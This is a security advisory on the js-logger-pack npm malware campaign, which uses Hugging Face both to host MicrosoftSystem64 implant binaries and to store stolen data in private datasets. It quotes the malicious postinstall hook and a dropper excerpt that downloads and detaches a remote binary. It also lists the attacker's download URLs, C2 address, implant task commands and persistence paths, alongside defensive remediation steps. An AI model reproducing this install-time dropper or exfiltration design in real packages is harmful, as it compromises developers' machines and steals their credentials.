js-logger-pack turns Hugging Face into a malware CDN and exfiltration backend

critical

CVE

Not assigned

CWE

CWE-506, CWE-494, CWE-522

Affected Surface

js-logger-pack 0.0.1 through 1.1.27, terminal-logger-utils 1.1.2, ts-logger-pack 1.1.3, pretty-logger-utils 1.0.0, pinno-loggers 1.0.0, Lordplay/system-releases Hugging Face repository, Developer workstations and CI runners on Windows, macOS, and Linux that installed affected npm packages

js-logger-pack has evolved from a fake npm logger into a cross-platform implant delivery chain. The latest public analysis shows the operator using Hugging Face for two roles at once: hosting MicrosoftSystem64 binaries and storing stolen victim data inside private Hugging Face datasets.

SafeDep first documented the malicious npm package in April. JFrog later extracted the current MicrosoftSystem64 second stage and showed that the Windows, macOS, and Linux binaries are Node.js Single Executable Application containers carrying the same embedded JavaScript implant. Cyber Security News reported on 28 May that the campaign remained active, with victims monitored in near real time and multiple related npm packages participating in the distribution chain.

Affected package chain

Primary package:

js-logger-pack 0.0.1 through 1.1.27

Related May 2026 logger packages:

terminal-logger-utils 1.1.2
ts-logger-pack 1.1.3
pretty-logger-utils 1.0.0
pinno-loggers 1.0.0

The first family, js-logger-pack, began as a fake logger with a benign-looking dist/index.js. Weaponized versions used postinstall execution, and early builds also loaded malicious code when the package was imported. The later terminal-logger-utils cluster uses the same basic pattern: dependency installation triggers an obfuscated dropper, which downloads a platform-specific second stage.

Install-time execution

JFrog’s analysis of js-logger-pack@1.1.27 shows a simple malicious trigger hidden behind a plausible logger package:

{
  "scripts": {
    "postinstall": "node print.cjs"
  }
}

The package-stage script detaches itself from the package manager, selects a platform binary, downloads it from Hugging Face, and launches it in the background:

const BINARY_BASE_URL = "https://huggingface.co/Lordplay/system-releases/resolve/main";
const DOWNLOAD_MAP = {
  "win32-x64": "MicrosoftSystem64-win.exe",
  "linux-x64": "MicrosoftSystem64-linux",
  "darwin-x64": "MicrosoftSystem64-darwin-x64",
  "darwin-arm64": "MicrosoftSystem64-darwin-arm64"
};

// The real package keeps running after npm install exits.
spawn(process.execPath, ["print.cjs", "--detached"], {
  detached: true,
  stdio: "ignore"
}).unref();

The related terminal-logger-utils package uses utils.cjs as the obfuscated dropper. Package-level details differ, but the behavior is the same class of risk: untrusted postinstall code fetches a remote binary, writes it to a user data directory, marks it executable, and registers persistence.

MicrosoftSystem64 implant

The second-stage payload is named MicrosoftSystem64 to blend into process lists and filesystem paths. JFrog extracted the embedded NODE_SEA_BLOB from the platform binaries and found that the malicious logic is the same JavaScript bundle across PE, Mach-O, and ELF wrappers.

The startup behavior includes:

setting the process title to MicrosoftSystem64
registering persistence on Windows, macOS, or Linux
connecting to 195[.]201[.]194[.]107:8010 over WebSocket and HTTP
monitoring clipboard contents
starting platform-specific keylogging
polling Hugging Face for updates through version.txt
resuming failed uploads from local state under .pcl-state

The task protocol gives the operator filesystem and implant-control primitives:

ping
get_system_info
list_drives
list_dir
read_text_file
read_file
write_file
scan_files
send_tdata
upload_folder_hf
clear_sessions
update_agent
deploy_binary

This is not a narrow credential grabber. It is a remote-control agent that can read and write arbitrary user-accessible files, deploy more binaries, and exfiltrate selected directories on demand.

Hugging Face as C2-adjacent infrastructure

The campaign abuses Hugging Face in two distinct places.

First, the npm dropper downloads platform binaries from:

https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-win.exe
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-darwin-x64
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-darwin-arm64
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-linux

Second, the implant can upload stolen folders to private Hugging Face datasets. JFrog documented an upload_folder_hf task where the controller supplies an hfToken, hfUsername, target path, and uploadId. The implant compresses the requested path, creates or reuses a private dataset named from the victim agent and path, uploads the archive with the Hugging Face client library, and tells the Hetzner controller when the upload is complete.

That design keeps bulk stolen data off the attacker’s visible C2 server:

victim host
  -> MicrosoftSystem64 task: upload_folder_hf
  -> gzip archive under temp directory
  -> private Hugging Face dataset
  -> /api/validate/hf-upload-complete notification to 195.201.194.107:8010

The same implant supports clear_sessions, which kills browser processes and destroys session stores. Combined with keylogging, this can force victims to reauthenticate and then capture the new credentials.

Persistence artifacts

Windows:

Scheduled task: \MicrosoftSystem64
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64
%LOCALAPPDATA%\MicrosoftSystem64.exe
%LOCALAPPDATA%\MicrosoftSystem64.vbs
%LOCALAPPDATA%\.registered

macOS:

~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist
~/Library/Application Support/MicrosoftSystem64
~/Library/Application Support/.registered
/tmp/.sys_.swift
/tmp/.sys_*_bin

Linux:

~/.config/systemd/user/MicrosoftSystem64.service
~/.config/autostart/MicrosoftSystem64.desktop
~/.local/share/MicrosoftSystem64
~/.local/share/.registered
~/.pcl-data/offline-queue.jsonl
~/.pcl-state/uploads.json

Early js-logger-pack builds also appended an attacker SSH key into ~/.ssh/authorized_keys on Linux, creating a direct shell backdoor if SSH was reachable.

Remediation

Any machine that installed an affected package should be treated as fully compromised. Removing the npm package is not sufficient because the payload installs OS-level persistence and can deploy additional binaries.

Immediate response steps:

npm ls js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers
pnpm why js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers
yarn why js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers

Then rebuild affected developer workstations or CI runners from known-good images where possible. Rotate all credentials reachable from the host, including npm tokens, GitHub tokens, SSH keys, cloud credentials, database passwords, wallet seeds, API keys, AI-tool tokens, Telegram sessions, browser-saved credentials, and deployment secrets.

Block and search telemetry for:

195.201.194.107:8010
api-sub.jrodacooker.dev
huggingface.co/Lordplay/system-releases
MicrosoftSystem64

Finally, disable lifecycle scripts by default in high-risk CI contexts and use explicit allowlists for packages that truly need preinstall, install, or postinstall execution. This campaign exists because package installation is still treated as a trusted code-execution event.